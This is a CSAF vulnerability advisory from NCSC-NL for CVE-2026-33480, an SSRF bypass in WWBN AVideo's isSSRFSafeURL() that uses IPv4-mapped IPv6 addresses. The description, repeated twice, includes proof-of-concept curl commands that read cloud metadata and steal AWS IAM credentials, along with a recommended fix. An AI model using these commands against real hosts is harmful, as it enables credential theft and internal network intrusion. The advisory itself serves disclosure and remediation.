{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33480", "tracking": { "current_release_date": "2026-03-26T00:48:14.924757Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33480", "initial_release_date": "2026-03-20T21:41:06.970431Z", "revision_history": [ { "date": "2026-03-20T21:41:06.970431Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T21:41:11.431881Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-23T18:11:00.805710Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-23T18:11:04.299910Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-23T22:51:07.997792Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-23T22:51:15.366469Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-24T03:19:13.858017Z", "number": "7", "summary": "Unknown change." }, { "date": "2026-03-24T20:54:19.473763Z", "number": "8", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-24T20:54:46.256820Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-24T21:37:26.730248Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-24T21:37:30.288057Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-25T20:11:39.906824Z", "number": "12", "summary": "References created (2)." }, { "date": "2026-03-26T00:46:36.371445Z", "number": "13", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)." } ], "status": "interim", "version": "13" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<=26.0", "product": { "name": "vers:unknown/<=26.0", "product_id": "CSAFPID-5893889", "product_identification_helper": { "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "AVideo" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/10.4", "product": { "name": "vers:unknown/10.4", "product_id": "CSAFPID-5656122", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.4" } } }, { "category": "product_version_range", "name": "vers:unknown/10.8", "product": { "name": "vers:unknown/10.8", "product_id": "CSAFPID-5656123", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.8" } } }, { "category": "product_version_range", "name": "vers:unknown/11", "product": { "name": "vers:unknown/11", "product_id": "CSAFPID-5656124", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1", "product": { "name": "vers:unknown/11.1", "product_id": "CSAFPID-5656125", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1.1", "product": { "name": "vers:unknown/11.1.1", "product_id": "CSAFPID-5656126", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.5", "product": { "name": "vers:unknown/11.5", "product_id": "CSAFPID-5656127", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.5" } } }, { "category": "product_version_range", "name": "vers:unknown/11.6", "product": { "name": "vers:unknown/11.6", "product_id": "CSAFPID-5656128", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.6" } } }, { "category": "product_version_range", "name": "vers:unknown/12.4", "product": { "name": "vers:unknown/12.4", "product_id": "CSAFPID-5656129", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@12.4" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3", "product": { "name": "vers:unknown/14.3", "product_id": "CSAFPID-5656130", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3.1", "product": { "name": "vers:unknown/14.3.1", "product_id": "CSAFPID-5656131", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/14.4", "product": { "name": "vers:unknown/14.4", "product_id": "CSAFPID-5656132", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.4" } } }, { "category": "product_version_range", "name": "vers:unknown/18.0", "product": { "name": "vers:unknown/18.0", "product_id": "CSAFPID-5656133", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@18.0" } } }, { "category": "product_version_range", "name": "vers:unknown/21.0", "product": { "name": "vers:unknown/21.0", "product_id": "CSAFPID-5721197", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@21.0" } } }, { "category": "product_version_range", "name": "vers:unknown/22.0", "product": { "name": "vers:unknown/22.0", "product_id": "CSAFPID-5772271", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@22.0" } } }, { "category": "product_version_range", "name": "vers:unknown/24.0", "product": { "name": "vers:unknown/24.0", "product_id": "CSAFPID-5772272", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@24.0" } } }, { "category": "product_version_range", "name": "vers:unknown/25.0", "product": { "name": "vers:unknown/25.0", "product_id": "CSAFPID-5840723", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@25.0" } } }, { "category": "product_version_range", "name": "vers:unknown/26.0", "product": { "name": "vers:unknown/26.0", "product_id": "CSAFPID-5878928", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@26.0" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<=26.0", "product": { "name": "vers:unknown/>=0|<=26.0", "product_id": "CSAFPID-5878929" } } ], "category": "product_name", "name": "avideo" } ], "category": "vendor", "name": "WWBN" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33480", "cwe": { "id": "CWE-918", "name": "Server-Side Request Forgery (SSRF)" }, "notes": [ { "category": "description", "text": "## Summary\n\nThe `isSSRFSafeURL()` function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (`::ffff:x.x.x.x`). The unauthenticated `plugin/LiveLinks/proxy.php` endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services.\n\n## Details\n\nThe `isSSRFSafeURL()` function in `objects/functions.php` (lines 4021-4169) implements SSRF protection with two separate check paths:\n\n1. **IPv4 checks** (lines 4101-4134): Regex patterns matching dotted-decimal notation (`/^10\\./`, `/^172\\./`, `/^192\\.168\\./`, `/^127\\./`, `/^169\\.254\\./`)\n2. **IPv6 checks** (lines 4150-4166): Checks for `::1`, `fe80::/10` (link-local), and `fc00::/7` (unique local)\n\nThe gap: IPv4-mapped IPv6 addresses (`::ffff:0:0/96`) are not checked in either path. When a URL like `http://[::ffff:169.254.169.254]/` is provided:\n\n```\n// Line 4038: parse_url strips brackets from IPv6 host\n$host = parse_url($url, PHP_URL_HOST);\n// $host = \"::ffff:169.254.169.254\"\n\n// Line 4079: filter_var recognizes it as valid IPv6, skips DNS resolution\nif (!filter_var($host, FILTER_VALIDATE_IP)) {\n $resolvedIP = gethostbyname($host); // SKIPPED\n}\n$ip = $host; // $ip = \"::ffff:169.254.169.254\"\n\n// Lines 4101-4134: IPv4 regex checks DON'T match (not dotted-decimal)\nif (preg_match('/^169\\.254\\.\\d{1,3}\\.\\d{1,3}$/', $ip)) // NO MATCH\n\n// Lines 4150-4166: IPv6 checks don't cover ::ffff: prefix\nif ($ip === '::1' || ...) // NO MATCH\nif (preg_match('/^fe[89ab][0-9a-f]:/i', $ip)) // NO MATCH\nif (preg_match('/^f[cd][0-9a-f]{2}:/i', $ip)) // NO MATCH\n\n// Line 4168: returns TRUE — bypass complete\nreturn true;\n```\n\nThe vulnerable endpoint `plugin/LiveLinks/proxy.php` explicitly disables authentication:\n\n```php\n// proxy.php lines 2-3\n$doNotConnectDatabaseIncludeConfig = 1;\n$doNotStartSessionbaseIncludeConfig = 1;\n```\n\nAfter the bypass, two requests are made to the attacker-controlled URL:\n1. `get_headers()` at line 40 (via stream context)\n2. `fakeBrowser()` at line 63 (via curl) — response content is echoed back to the attacker (lines 69-80)\n\n## PoC\n\n**Read AWS instance metadata (IAM credentials):**\n\n```bash\ncurl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/'\n```\n\n**Access localhost services:**\n\n```bash\ncurl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:127.0.0.1]:3306/'\n```\n\n**Scan internal network:**\n\n```bash\ncurl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:10.0.0.1]/'\n```\n\n**Steal AWS IAM role credentials (full chain):**\n\n```bash\n# Step 1: Get IAM role name\nROLE=$(curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/')\n\n# Step 2: Get temporary credentials for the role\ncurl -s \"https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/${ROLE}\"\n```\n\n## Impact\n\n- **Cloud credential theft**: Unauthenticated attackers can read cloud instance metadata (AWS IMDSv1, GCP, Azure) to steal IAM credentials, potentially gaining full access to cloud infrastructure.\n- **Internal network access**: Attackers can scan and access internal services not exposed to the internet, including databases, admin panels, and other backend services.\n- **Localhost service access**: Attackers can interact with services bound to localhost (e.g., Redis, Memcached, internal APIs).\n- **No authentication required**: The endpoint explicitly disables session handling and database connections, making this exploitable by any anonymous internet user.\n\n## Recommended Fix\n\nReplace the manual IPv4/IPv6 blocklist approach with PHP's built-in `FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE` flags, which correctly handle all private/reserved ranges including IPv4-mapped IPv6 addresses:\n\n```php\n// In isSSRFSafeURL(), replace lines 4099-4166 with:\n\n// Block all private and reserved IP ranges (handles IPv4, IPv6, and IPv4-mapped IPv6)\nif (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {\n _error_log(\"isSSRFSafeURL: blocked private/reserved IP: {$ip}\");\n return false;\n}\n```\n\nThis single check replaces all the manual regex patterns and correctly handles:\n- All RFC 1918 private ranges (10/8, 172.16/12, 192.168/16)\n- Loopback (127/8, ::1)\n- Link-local (169.254/16, fe80::/10)\n- Unique local (fc00::/7)\n- **IPv4-mapped IPv6 (`::ffff:0:0/96`)** — the bypass vector in this finding\n- Other reserved ranges (0/8, 100.64/10 CGN, etc.)", "title": "github - https://api.github.com/advisories/GHSA-p3gr-g84w-g8hh" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `isSSRFSafeURL()` function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (`::ffff:x.x.x.x`). The unauthenticated `plugin/LiveLinks/proxy.php` endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services. Commit 75ce8a579a58c9d4c7aafe453fbced002cb8f373 contains a patch.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33480.json" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `isSSRFSafeURL()` function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (`::ffff:x.x.x.x`). The unauthenticated `plugin/LiveLinks/proxy.php` endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services. Commit 75ce8a579a58c9d4c7aafe453fbced002cb8f373 contains a patch.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33480" }, { "category": "description", "text": "## Summary\n\nThe `isSSRFSafeURL()` function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (`::ffff:x.x.x.x`). The unauthenticated `plugin/LiveLinks/proxy.php` endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services.\n\n## Details\n\nThe `isSSRFSafeURL()` function in `objects/functions.php` (lines 4021-4169) implements SSRF protection with two separate check paths:\n\n1. **IPv4 checks** (lines 4101-4134): Regex patterns matching dotted-decimal notation (`/^10\\./`, `/^172\\./`, `/^192\\.168\\./`, `/^127\\./`, `/^169\\.254\\./`)\n2. **IPv6 checks** (lines 4150-4166): Checks for `::1`, `fe80::/10` (link-local), and `fc00::/7` (unique local)\n\nThe gap: IPv4-mapped IPv6 addresses (`::ffff:0:0/96`) are not checked in either path. When a URL like `http://[::ffff:169.254.169.254]/` is provided:\n\n```\n// Line 4038: parse_url strips brackets from IPv6 host\n$host = parse_url($url, PHP_URL_HOST);\n// $host = \"::ffff:169.254.169.254\"\n\n// Line 4079: filter_var recognizes it as valid IPv6, skips DNS resolution\nif (!filter_var($host, FILTER_VALIDATE_IP)) {\n $resolvedIP = gethostbyname($host); // SKIPPED\n}\n$ip = $host; // $ip = \"::ffff:169.254.169.254\"\n\n// Lines 4101-4134: IPv4 regex checks DON'T match (not dotted-decimal)\nif (preg_match('/^169\\.254\\.\\d{1,3}\\.\\d{1,3}$/', $ip)) // NO MATCH\n\n// Lines 4150-4166: IPv6 checks don't cover ::ffff: prefix\nif ($ip === '::1' || ...) // NO MATCH\nif (preg_match('/^fe[89ab][0-9a-f]:/i', $ip)) // NO MATCH\nif (preg_match('/^f[cd][0-9a-f]{2}:/i', $ip)) // NO MATCH\n\n// Line 4168: returns TRUE — bypass complete\nreturn true;\n```\n\nThe vulnerable endpoint `plugin/LiveLinks/proxy.php` explicitly disables authentication:\n\n```php\n// proxy.php lines 2-3\n$doNotConnectDatabaseIncludeConfig = 1;\n$doNotStartSessionbaseIncludeConfig = 1;\n```\n\nAfter the bypass, two requests are made to the attacker-controlled URL:\n1. `get_headers()` at line 40 (via stream context)\n2. `fakeBrowser()` at line 63 (via curl) — response content is echoed back to the attacker (lines 69-80)\n\n## PoC\n\n**Read AWS instance metadata (IAM credentials):**\n\n```bash\ncurl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/'\n```\n\n**Access localhost services:**\n\n```bash\ncurl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:127.0.0.1]:3306/'\n```\n\n**Scan internal network:**\n\n```bash\ncurl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:10.0.0.1]/'\n```\n\n**Steal AWS IAM role credentials (full chain):**\n\n```bash\n# Step 1: Get IAM role name\nROLE=$(curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/')\n\n# Step 2: Get temporary credentials for the role\ncurl -s \"https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/${ROLE}\"\n```\n\n## Impact\n\n- **Cloud credential theft**: Unauthenticated attackers can read cloud instance metadata (AWS IMDSv1, GCP, Azure) to steal IAM credentials, potentially gaining full access to cloud infrastructure.\n- **Internal network access**: Attackers can scan and access internal services not exposed to the internet, including databases, admin panels, and other backend services.\n- **Localhost service access**: Attackers can interact with services bound to localhost (e.g., Redis, Memcached, internal APIs).\n- **No authentication required**: The endpoint explicitly disables session handling and database connections, making this exploitable by any anonymous internet user.\n\n## Recommended Fix\n\nReplace the manual IPv4/IPv6 blocklist approach with PHP's built-in `FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE` flags, which correctly handle all private/reserved ranges including IPv4-mapped IPv6 addresses:\n\n```php\n// In isSSRFSafeURL(), replace lines 4099-4166 with:\n\n// Block all private and reserved IP ranges (handles IPv4, IPv6, and IPv4-mapped IPv6)\nif (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {\n _error_log(\"isSSRFSafeURL: blocked private/reserved IP: {$ip}\");\n return false;\n}\n```\n\nThis single check replaces all the manual regex patterns and correctly handles:\n- All RFC 1918 private ranges (10/8, 172.16/12, 192.168/16)\n- Loopback (127/8, ::1)\n- Link-local (169.254/16, fe80::/10)\n- Unique local (fc00::/7)\n- **IPv4-mapped IPv6 (`::ffff:0:0/96`)** — the bypass vector in this finding\n- Other reserved ranges (0/8, 100.64/10 CGN, etc.)", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-p3gr-g84w-g8hh.json?alt=media" }, { "category": "other", "text": "0.00032", "title": "EPSS" }, { "category": "other", "text": "3.6", "title": "NCSC Score" }, { "category": "other", "text": "Is related to (a version of) an uncommon product, There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5893889", "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-p3gr-g84w-g8hh" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33480.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33480" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-p3gr-g84w-g8hh.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-p3gr-g84w-g8hh" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-p3gr-g84w-g8hh" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/commit/75ce8a579a58c9d4c7aafe453fbced002cb8f373" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33480" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929", "CSAFPID-5893889" ] } ], "title": "CVE-2026-33480" } ] }